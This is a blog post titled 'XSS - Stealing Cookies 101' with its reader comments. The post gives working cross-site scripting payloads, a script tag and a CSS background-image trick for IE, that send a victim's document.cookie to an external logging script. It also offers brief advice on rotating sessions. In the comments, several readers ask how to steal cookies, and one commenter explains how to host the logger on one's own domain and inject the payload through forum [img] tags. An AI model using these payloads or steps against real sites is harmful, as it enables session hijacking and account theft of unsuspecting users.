XSS - Stealing Cookies 101
Stealing cookies is easy. Never trust a client to be who you think it is. Just because it was trusted a few seconds ago, doesn't mean it will be in a few seconds, ESPECIALLY if a cookie is all you use to identify a client.
A recent LiveJournal hack has brought this to light again. Back when MySpace was hacked in October it reminded us that we must be vigilant in filtering text which users post because a hacker could smuggle in some javascript code to maliciously use the site from the browsers of authenticated users.
By stealing a users cookies as the LiveJournal hack did, you don't even have to cary out the attack in the users browser; you can do it elsewhere. Worst of all stealing cookies is EASY TO DO, and HARD TO PROTECT AGAINST.
Easy to do?
<script>
new Image().src="http://jehiah.com/_sandbox/log.cgi?c="+encodeURI(document.cookie);
</script>
We can also use another method in IE. Execute the javascript in CSS.
<style>
.getcookies{background-image:url('javascript:new Image().src="http://jehiah.com/_sandbox/log.cgi?c="+encodeURI(document.cookie);');}
</style>
<p class="getcookies"></p>
So, you might want to start believing every session is stollen. I didn't even try to obfuscate that. Start rolling your sessions id's from one value to another, expire them in short intervals. Track the referrer, user agent, etc. Some of these changes don't add any real security, but they do add layers; and that always helps.
If you are not familiar with the MySpace XSS hack, read up. It's rich on the details.
If you want to view my server side logging script log.cgi, check it out; it's just a simple python cgi script that dumps the cookies to a text file.
2 years, 9 months ago
Can you please put the log.cgi on the site, nice Topic.
2 years, 9 months ago
Thanks for the comment; I originally intended to, but clearly forgot. I’ve updated the page above with a link.
2 years, 8 months ago
What CHMOD should I give it ?
2 years, 6 months ago
how do you steel cookies
2 years, 3 months ago
[…] XSS - Stealing Cookies 101 “Any time you let users post text and you don’t religiously restrict the content, they can steal sessions. Scarry? If you are a developer it better scare the hell out of you.” Not only scarry, but scary too. Oi! (tags: security javascript cookies xss programming) […]
2 years, 3 months ago
nice info .. but i want to know how to steal cookies ..i know IP address of a computer but in a different country …
2 years, 2 months ago
[…] 5.1 Information theft Stealing Cookies, login credentials, banking information etc. http://jehiah.com/archive/xss-stealing-cookies-101 […]
2 years, 2 months ago
sweet tutorial. it is suprising at how many sites dont filter user input as they should. With eveyone having blogs, and posting comments on social community websites Im sure that these kinds of attacks will be on the rise. Thanks for posting this.
1 year, 6 months ago
new Image().src=”http://jehiah.com/_sandbox/log.cgi?c=”+encodeURI(document.cookie);
That would work then?
1 year, 6 months ago
new Image().src=”http://jehiah.com/_sandbox/log.cgi?c=”+encodeURI(document.cookie);
1 year, 5 months ago
Thoomas I believe you’ve got to get the users browser to execute that link.
One way to do this is to add that in forums [img] tags!
OH AND TO THE OWNER OF THIS WEB SITE:
Dued, BLUEberrys are what color? that’s the first time I’ve seen this sort of auth system. Pretty nice, and would be pretty darn east to implement too. Get a few more obvious Q’s and randomize them each time. hee hee.
1 year, 3 months ago
alert(’foo’);
1 year, 1 month ago
OK, this is great, but if it was in English so I could understand it…
Sorry, but some of us are computer illiterate in a lot of ways. Can you tell me the simplest way in the simplest terms how to prevent phishing? Many people don’t even know the word phish and it seems to me that those of us that aren’t “in the know” are the root of the the way these things are spread. If you can explain it to me and I can do it, I can pass it on to all my friends who can send it to their friends and away we go.
Thanks so much for your time!!
1 year, 1 month ago
erm BBcode???
1 year, 1 month ago
where do the cookies go or where do you see them ?
10 months ago
Can the server sided log.cgi file be uploaded on a free server like geocities.com?
where do will i get the cookies? i mean the result file where it will..how to view it
6 months, 1 week ago
.getcookies{background-image:url(’javascript:new Image().src=”http://jehiah.com/_sandbox/log.cgi?c=”+encodeURI(document.cookie);’);}
AMIDOINGITRITE?
5 months, 4 weeks ago
alert(”lawl”)
5 months, 2 weeks ago
Excellent tutorial. I can’t believe some of the comments on here, though. Apparently, people want to send you all of the cookies they intend to capture using this method. Jeez. People, you have to copy the log.cgi file to your own server, then provide the link as:
new Image().src=”http://www.YOURDOMAIN.WHATEVER/log.cgi?c=”+encodeURI(document.cookie);
Next, you add your personalized version of this link and insert it into whatever website you’re trying to snarf the cookies from. If it’s a forum, you would use the [img][/img] BBCode.
There are many types of XSS exploits like this. Do more research, folks.
5 months, 1 week ago
ok after i post
new Image().src=”http://www.YOURDOMAIN.WHATEVER/log.cgi?c=”+encodeURI(document.cookie);
and i have the log.cgi uploaded whats next?
4 weeks ago
Simple XSS test.. just curious